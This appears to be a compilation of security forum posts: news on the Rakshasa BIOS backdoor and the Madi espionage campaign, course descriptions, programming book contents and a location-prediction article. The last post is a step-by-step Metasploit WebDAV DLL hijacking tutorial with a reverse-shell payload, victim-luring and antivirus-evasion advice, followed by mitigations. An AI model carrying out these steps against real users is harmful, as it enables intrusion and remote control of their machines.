For the last decade, persistent e-threats in the form of malicious code sneaking into firmware, EPROMs or BIOS chips were just a bad dream for antivirus companies. This dream has now become a cruel possibility with the introduction of Jonathan Brossard’s proof-of-concept tool that can compromise the OS at boot by replacing the BIOS (Basic Input Output System). Named Rakshasa (after a demon in Hindu mythology), the backdoor can go as deep as the computer’s BIOS by replacing the motherboard’s genuine BIOS with a combination of Coreboot and SeaBIOS, two open-source alternatives to specific vendor-supplied firmware. The BIOS is not the only place it copies its code: Rakshasa interferes with the PCI firmware peripheral devices such as network cards or CD-ROMs to achieve persistency and redundancy. It also writes an open source network boot firmware called iPXE to the computer’s network card. So even if someone restored the original BIOS, the rogue firmware on the network card or the CS-ROM can very well be used to access and restart the fake one. The matter is even worse as antivirus software usually can’t scan those areas, nor can it disinfect the malicious code because of the read-only nature of the medium. Terminating the malware can be done only with the user manually reflashing every peripheral which requires dedicated equipment and professional know-how. More than that, file forensics is nearly impossible, even if the attack is detected. “We never touch the file system,” Brossard said, quoted by PCWorld. “If you send the hard drive to a company and ask them to analyze it for malware they won’t be able to find it,” he said. Unfortunately, the attack can be carried out both locally (when the attacker has hands-on access to the machine), as well as remotely. Even though the proof-of-concept code has not been made public, the simple mentioning of the open-source toolset can be enough for tech-savvy cyber-criminals to replicate the attack. The full research paper is available online. research paper sursa: Security Researcher Introduces Proof-of-Concept Tool to Infect BIOS, Network Cards, CD-ROMs | HOTforSecurity

"Acolo si-au facut aparitia si multi reprezentanti ai unor agentii guvernamentale, veniti la vanatoare de hackeri talentati, care vor sa lucreze pentru FBI, CIA sau NASA." hacker != manuitor de havij sau alte unelte de gradinarit am facut precizarea pt copiii copaci ce viseaza la asemenea joburi

Kaspersky: The Madi Campaign - Part I - Securelist Seculert: Seculert Blog: Mahdi - The Cyberwar Savior? rezumatul (devirusare.com) Kaspersky Lab anunta rezultatele unei investigatii realizate impreuna cu Seculert, o companie specializata in identificarea amenintarilor informatice avansate, cu privire la „Madi”, o campanie activa de spionaj cibernetic, care tinteste victime din Orientul Mijlociu. Descoperita initial de Seculert, Madi este o operatiune de infiltrare in retelele de computere, folosind un troian raspandit cu ajutorul tehnicilor de inginerie sociala catre anumite tinte, alese special. Kaspersky Lab si Seculert au colaborat pentru a realiza procesul de sinkhole (redirectionarea traficului catre serverul de C&C, pentru ca atacatorii sa nu mai poata controla calculatoarele infectate) a serverelor de Comanda & Control (C&C) a Madi, identificand – in ultimele opt luni – peste 800 de victime, localizate in Iran, Israel si anumite tari din intreaga lume. Statisticile dezvaluie faptul ca victimele sunt, in principal, oameni de afaceri implicati in proiecte de infrastructura critica din Iran si Israel, institutii financiare israeliene, studenti in inginerie din Orientul Mijlociu, precum si multiple agentii guvernamentale, care comunica in aceasta zona. Procesul de analiza a malware-ului a scos la lumina o cantitate neobisnuita de documente si imagini de natura politica si religioasa, care erau copiate in computer si afisate in momentul infectiei. „Cu toate ca malware-ul si infrastructura campaniei nu sunt la fel de complexe ca alte proiecte similare, atacatorii din spatele Madi au reusit sa conduca o operatiune de supraveghere a victimelor high-profile”, spune Nicolas Brulez, Senior Malware Researcher la Kaspersky Lab. „Probabil ca amatorismul si abordarea rudimentara a Madi i-au ajutat sa evite detectia in toata aceasta perioada, respectiv sa li se acorde atentia unei amenintari avansate”, completeaza Brulez. „In urma analizei comune, am descoperit ca multe linii de cod din malware si instrumentele C&C erau scrise in persana, lucru interesant si neobisnuit pentru un cod malitios. Fara indoiala, atacatorii vorbesc fluent aceasta limba”, spune Aviv Raff, Chief Technology Officer la Seculert. Troianul Madi permite infractorilor cibernetici sa fure informatii confidentiale de pe computerele cu sisteme de operare Microsoft Windows, sa monitorizeze comunicarea prin email si programele de mesagerie instant, sa inregistreze audio si intrarile din tastatura, precum si sa realizeze capturi de ecran. Analiza confirma faptul ca mai multi gigabytes de informatie au ajuns pe serverele infractorilor. Printre aplicatiile si paginile web spionate se numara conturile de Gmail, Hotmail, Yahoo! Mail, ICQ, Skype, Google+ si Facebook ale victimelor. Supravegherea era condusa si prin intermediul sistemelor ERP/CRM integrate, a contractelor de business si sistemelor de administrare financiara.

Creator: Matt Briggs License: Creative Commons: Attribution, Share-Alike (Creative Commons — Attribution-ShareAlike 3.0 Unported — CC BY-SA 3.0) Lab Requirements: Windows system with IDA Pro (Free 5.0 is acceptable). Microsoft Visual Studio 2008 redistributable package. Class Textbook: Reversing: Secrets of Reverse Engineering by Eldad Eilam. Recommended Class Duration: 2 days Creator Available to Teach In-Person Classes: Yes Author Comments: Throughout the history of invention curious minds have sought to understand the inner workings of their gadgets. Whether investigating a broken watch, or improving an engine, these people have broken down their goods into their elemental parts to understand how they work. This is Reverse Engineering (RE), and it is done every day from recreating outdated and incompatible software, understanding malicious code, or exploiting weaknesses in software. In this course we will explore what drives people to reverse engineer software and the methodology and tools used to do it. Topics include, but are not limited to: •Uses for RE •The tricks and pitfalls of analyzing compiled code •Identifying calling conventions •How to navigate x86 assembly using IDA Pro •Identifying Control Flows •Identifying the Win32 API •Using a debugger to aid RE •Dynamic Analysis tools and techniques for RE During the course students will complete many hands on exercises. This class will serve as a prerequisite for a later class on malware analysis. Before taking this class you should take Introduction to Intel x86 or have equivalent knowledge. All Material (TiddlyWiki (html+javascript) & analyzed binaries (PE)) 8:33:02 total sursa: http://opensecuritytraining.info/IntroductionToReverseEngineering.html

Creator: Corey K. License: Creative Commons: Attribution, Share-Alike (Creative Commons — Attribution-ShareAlike 3.0 Unported — CC BY-SA 3.0) Lab Requirements: Linux VM provided below. Or any Linux VM with the provided vulnerable software examples installed. Class Textbook: The Shellcoder’s Handbook by Chris Anley et al. Recommended Class Duration: 2 days Creator Available to Teach In-Person Classes: Yes Author Comments: Software vulnerabilities are flaws in program logic that can be leveraged by an attacker to execute arbitrary code on a target system. This class will cover both the identification of software vulnerabilities and the techniques attackers use to exploit them. In addition, current techniques that attempt to remediate the threat of software vulnerability exploitation will be discussed. This will be a lab driven class where specific software vulnerability types in particular environments are discussed and then exploited in a lab setting. Examples of lab components of the class as well as specific topics covered include: •Shellcode development •Stack overflow exploitation •Heap overflow exploitation •Static source code analysis •Defeating non-executable stack protection The class will help students be more aware of the specific details and mechanisms of software exploits we see in the wild. This knowledge will enable the students to better analyze their own software for vulnerabilities in an effort to produce more secure code. Slides: ppt odp pdf Exercise Code (.tgz) 9:38:54 totalsursa: http://opensecuritytraining.info/IntroductionToSoftwareExploits.html

The Hard Way Is Easier Exercise 0: The Setup Exercise 1: A Good First Program Exercise 2: Comments And Pound Characters Exercise 3: Numbers And Math Exercise 4: Variables And Names Exercise 5: More Variables And Printing Exercise 6: Strings And Text Exercise 7: More Printing Exercise 8: Printing, Printing Exercise 9: Printing, Printing, Printing Exercise 10: What Was That? Exercise 11: Asking Questions Exercise 12: Libraries Exercise 13: Parameters, Unpacking, Variables Exercise 14: Prompting And Passing Exercise 15: Reading Files Exercise 16: Reading And Writing Files Exercise 17: More Files Exercise 18: Names, Variables, Code, Functions Exercise 19: Functions And Variables Exercise 20: Functions And Files Exercise 21: Functions Can Return Something Exercise 22: What Do You Know So Far? Exercise 23: Read Some Code Exercise 24: More Practice Exercise 25: Even More Practice Exercise 26: Congratulations, Take A Test! Exercise 27: Memorizing Logic Exercise 28: Boolean Practice Exercise 29: What If Exercise 30: Else And If Exercise 31: Making Decisions Exercise 32: Loops And Arrays Exercise 33: While Loops Exercise 34: Accessing Elements Of Arrays Exercise 35: Branches and Functions Exercise 36: Designing and Debugging Exercise 37: Symbol Review Exercise 38: Doing Things To Lists Exercise 39: Hashes, Oh Lovely Hashes Exercise 40: Modules, Classes, And Objects Exercise 41: Learning To Speak Object Oriented Exercise 42: Is-A, Has-A, Objects, and Classes Exercise 43: Gothons From Planet Percal #25 Exercise 44: Inheritance Vs. Composition Exercise 45: You Make A Game Exercise 46: A Project Skeleton Exercise 47: Automated Testing Exercise 48: Advanced User Input Exercise 49: Making Sentences Exercise 50: Your First Website Exercise 51: Getting Input From A Browser Exercise 52: The Start Of Your Web Game Next Steps Advice From An Old Programmer sursa: http://ruby.learncodethehardway.org/book/

The Hard Way Is Easier Exercise 0: The Setup Exercise 1: A Good First Program Exercise 2: Comments And Pound Characters Exercise 3: Numbers And Math Exercise 4: Variables And Names Exercise 5: More Variables And Printing Exercise 6: Strings And Text Exercise 7: More Printing Exercise 8: Printing, Printing Exercise 9: Printing, Printing, Printing Exercise 10: What Was That? Exercise 11: Asking Questions Exercise 12: Prompting People Exercise 13: Parameters, Unpacking, Variables Exercise 14: Prompting And Passing Exercise 15: Reading Files Exercise 16: Reading And Writing Files Exercise 17: More Files Exercise 18: Names, Variables, Code, Functions Exercise 19: Functions And Variables Exercise 20: Functions And Files Exercise 21: Functions Can Return Something Exercise 22: What Do You Know So Far? Exercise 23: Read Some Code Exercise 24: More Practice Exercise 25: Even More Practice Exercise 26: Congratulations, Take A Test! Exercise 27: Memorizing Logic Exercise 28: Boolean Practice Exercise 29: What If Exercise 30: Else And If Exercise 31: Making Decisions Exercise 32: Loops And Lists Exercise 33: While Loops Exercise 34: Accessing Elements Of Lists Exercise 35: Branches and Functions Exercise 36: Designing and Debugging Exercise 37: Symbol Review Exercise 38: Doing Things To Lists Exercise 39: Dictionaries, Oh Lovely Dictionaries Exercise 40: Modules, Classes, And Objects Exercise 41: Learning To Speak Object Oriented Exercise 42: Is-A, Has-A, Objects, and Classes Exercise 43: Gothons From Planet Percal #25 Exercise 44: Inheritance Vs. Composition Exercise 45: You Make A Game Exercise 46: A Project Skeleton Exercise 47: Automated Testing Exercise 48: Advanced User Input Exercise 49: Making Sentences Exercise 50: Your First Website Exercise 51: Getting Input From A Browser Exercise 52: The Start Of Your Web Game Next Steps Advice From An Old Programmer sursa: http://learnpythonthehardway.org/book/

An algorithm can better predict your future movements by getting a little help from your friends. Track to the future: Movement of three users around Switzerland’s Lake Geneva are indicated with different symbols. GPS positions at the same time are indicated with the same color. Beyond merely tracking where you've been and where you are, your smartphone might soon actually know where you are going—in part by recording what your friends do. Researchers in the U.K. have come up with an algorithm that follows your own mobility patterns and adjusts for anomalies by factoring in the patterns of people in your social group (defined as people who are mutual contacts on each other's smartphones). The method is remarkably accurate. In a study on 200 people willing to be tracked, the system was, on average, less than 20 meters off when it predicted where any given person would be 24 hours later. The average error was 1,000 meters when the same system tried to predict a person's direction using only that person's past movements and not also those of his friends, says Mirco Musolesi, a computer scientist at the University of Birmingham who led the study. He cautions that the 200 participants might not reflect the general population—they all lived within 30 miles of Lausanne, Switzerland, and were mainly "students, researchers, and people that are fairly predictable anyway." Even so, he says, the findings were noteworthy because "we are essentially exploiting the synchronized rhythm of the city" for greater predictive insights. Although it is still a research prototype, the prediction algorithm, described in this paper, could be a boon to mobile network operators if it proves more widely applicable. These companies already possess such data and could use it to provide a sharper recommendations or ads for restaurants or shops near locations where you are likely to go. Musolesi's group is planning to build a developer platform based on the algorithm. This paper was part of a Nokia-sponsored Mobile Data Challenge, at which the Birmingham group won 3,000 euros for their work. Other papers from the contest can be found here. All the projects drew on the same smartphone dataset from the 200 volunteers, who agreed to have their location, communication patterns, app usage, and other metrics tracked over an 18-month period ending in 2011. To explain how your friends' patterns can be used to refine predictions about you, Musolesi gave an example. If Susan goes from home to the gym every Tuesday at 7 p.m. following a certain route, a prediction algorithm based only on her past movements might be thrown off on a certain Tuesday when she makes a side trip to the mall. But by noticing that her close friends Joe and Bob are in their usual hangouts that day, Musolesi's algorithm can determine that Susan is highly likely to go to the gym after finishing her mall errand. Habits and patterns of friends are highly correlated, meaning there will be enough noise-free information from the friends' mobility patterns to extrapolate from them. Naturally, the predictions can be refined even more when two people often spend time with each other, but such "mutual information" is not required for a friend's information to be useful. The research grew out of a mid-2000s reality mining project, also sponsored by Nokia, that sought to glean insights about social interactions from personal devices. That work took place before the current smartphone boom. "It is exciting to see the project flesh out some of the hints and preliminary results we've seen in our earlier projects. This field is really moving toward being practical," said Alex "Sandy" Pentland, director of the MIT's Human Interactions Lab, referring to all of the research done on the Lausanne data. He added that progress in the field—together with the many commercial efforts that already extensively mine and leverage personal data—makes it even more crucial for companies, governments, and researchers to follow a personal data privacy and usage framework developed at Davos last year. Sursa: http://www.technologyreview.com/news/428441/a-phone-that-knows-where-youre-going/

am primit un pm sa ma uit la fisierele de mai sus si sa-mi dau cu parerea intr-un post nu-s nici blindate nici bindate, vb colegului de mai sus

In this article, I will explain WebDAV application DLL hijacking exploitation using our all time favorite, Metasploit. Here we will cover the module which has a directory of file extensions that can lead to code execution. This module presents a directory of file extensions that can lead to code execution when opened from the share. In order to exploit using this method, the attacker has to force a SMB client to make a connection to a malicious server. This can be done in several ways. For example, sending e-mails that contain links to external web or file servers will lure the target into clicking the link and visiting the malicious server. Or attackers can send messages via instant-messenger and social-networking services with contaminated links. Additionally, infected .dll file extensions can be hidden within legitimate files like videos, software setups, etc., which are then uploaded in various file upload websites. Computers that are already infected will share dll extensions using network share, and then try their best to spread their infected files and links to malicious file serves with other clean computers. Some Information about this Vulnerability: To exploit this vulnerability, the victim has to open the malicious file from a directory which the attacker controls. In most cases, the victim must first browse to the directory, then open the specific file for this exploit to trigger. For example, a link to \\server\malicious_folder would lead to code execution if the user opened a file from this directory, but a direct link to \\server\malicious_folder\maliciousfile.ext would not trigger this issue. There are some exceptions, but these tend to be application-specific problems Steps: To perform the WebDAV dll hijacking using SET, follow these steps: First, select the option 2 in the SET toolkit which says “website attack vectors”. Once this option is selected, enter the option 2-site cloner and enter the site of our choice. Once entered, the SET framework will generate a fake webpage of the specified website. To employ WebDAV dll hijacking, we will be using the Metasploit browser exploit method, from which we will be selecting the module named: webdav_dll_hijacker. Now select option 7, which is Microsoft Windows WebDAV app dll hijacker. Select the payload now, and here select the windows_reverse_tcp Meterpreter option, which is option 2 in this tool. Enter the port to use the reverse connection. Once it’s configured, it’s time to enter the file extensions like .wab, which is the default file extension. Once the settings are configured, the server will get started. You will now see the exploit link, which should look something like: http:// Attackers ip: 8080. Now send the link to your victim, and once he or she accesses the link, they will be directed to a document folder with many file extensions. Once the victim opens the file, the exploit will have executed and the attacker will get an open session. Beware. While using this webdav_dll_hijacker exploit with Metasploit module, you run the risk of being detected by a select few antivirus software programs. Theses programs will look for malicious dll, so it’s recommended to encode dll before the attack. Mitigation Methods: This particular issue affects those applications which do not load external libraries securely. There are other recommended methods to load the libraries which are safe against these kind of attacks It’s advised that the user should not visit any untrustworthy remote file system locations or WebDAV shares and open a document from these locations, because it takes user interaction for a successful attack. Disable the “Web Client” server on all of your desktops through group policy. Block outbound SMB at the perimeter as this also prevents SMB Relay attacks and NTLM hash harvesting. To know more about DDL security, Microsoft has released a guideline. You can learn about it at: Dynamic-Link Library Security (Windows) About CWDIllegalInDllSearch: Microsoft also released an update which introduces a new registry entry CWDIllegalInDllSearch that allows users to control the DLL search path algorithm. The update allows the administrator to define various actions on a system basis, or on a per-application basis (like preventing any application from loading the library from the Webdav location or remote UNC location). The update also removes the current working directory from the library. How this Works: Normally when an application dynamically loads a dll without specifying a path, Windows will try to locate the specific dll by searching through a set of directories, which is known as the dll search path. Once Windows is able to locate the dll in a directory, Windows will load that required dll. If Windows is not able to find the DLL in the directories in the DLL search order, then Windows will return a failure for the operation. The CWDIllegalInDllSearch registry entry enables the administrators to modify the behavior of the dll search path algorithm that is used by LoadLibrary and LoadLibraryEx. With this registry entry, administrators can allow certain kinds of directories to be skipped. The CWDIllegalInDllSearch registry entry can be added in the following path: To use this registry entry for all the applications on a computer: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager To use this registry entry for a specified application on a computer: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<application binary name> For example, to disable loading dlls from a WebDAV share for all applications that are installed on your local computer (Note: you have to log on as administrator): First Open the Registry Editor. Locate and then click the following registry subkey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager Right-click Session Manager, select New, and then click on Dword Value. Type CWDIllegalInDllSearch, and then click Modify. In the Value data box, type 1, and then click OK. Sursa: http://resources.infosecinstitute.com/webdav-exploitation/